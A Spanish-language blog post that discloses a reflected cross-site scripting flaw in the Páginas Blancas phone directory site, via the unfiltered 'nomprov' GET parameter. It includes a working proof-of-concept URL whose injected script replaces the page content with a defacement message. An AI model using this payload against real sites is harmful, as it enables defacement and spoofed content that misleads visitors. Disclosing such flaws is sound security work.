vulnerabilidad en paginas blancas
Investigando un poco el otro día con @jesux, mirando como podría utilizar la pagina web de paginas blancas para crear una función a partir de la cual pudiera buscar direcciones y números de teléfono dentro de un widget o una web. Y revisando la forma de obtención de datos del sistema encontré un fallo bastante importante... al realizar una búsqueda uno de los parámetros que se pasa por GET es nomprov, una variable que no se le pasa ningún filtro para evitar la inyección de código. un ejemplo de la peligrosidad de eso puede ser el siguiente enlace.
-
http://blancas.paginasamarillas.es/jsp/resultados.jsp?no=javier&sec=34&pgpv=1&tbus=0&nomprov=Palecnia
-
http://blancas.paginasamarillas.es/jsp/resultados.jsp?no=javier&sec=34&pgpv=1&tbus=0&nomprov=<script>var body = document.getElementsByTagName('html'); body[0].innerHTML = '<html><center><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>Entra en Tierra0.com para ver como se ha echo.<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br></center></html>';</script>
La URL modificada inserta un código javascript que sustituye el contenido de la etiqueta HTML por el código que nosotros deseamos lo que puede ser un peligro a la hora de fiarnos de los resultados de una búsqueda.
¡Participa en la discusión!
Comparte este artículo
Licencia de los contenidos
© Todos los derechos reservados